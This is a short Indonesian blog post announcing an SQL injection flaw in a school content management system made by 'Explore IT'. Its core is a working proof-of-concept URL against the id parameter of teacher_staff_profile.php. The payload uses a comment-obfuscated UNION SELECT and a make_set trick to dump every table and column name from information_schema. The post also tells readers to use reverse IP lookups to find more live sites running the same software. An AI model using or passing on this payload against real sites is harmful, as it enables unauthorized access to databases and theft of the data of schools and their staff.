BLANTERWISDOM101

SQL INJECTION on SistemIT's CMS

Jumat, 04 Juni 2021

Assalamualaikum!
Halo wibu!, kali ini, saya akan membagikan informasi tentang bug SQL injecton pada cms yang dikembangkan oleh Explore IT.

Oke, langsung saja:
1. Live target:
Note: Reverse IP untuk mencari yg lainnya.
2. PoC: 
http://localhost/teacher_staff_profile.php?id=-1' and true /**//*!50000UNION/**/SELECT*/ 1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+-

Yup, sekian dulu dari gw see you later senpai^-^
Share This :
Mhmdvr

Don't be Stup1d.

0 komentar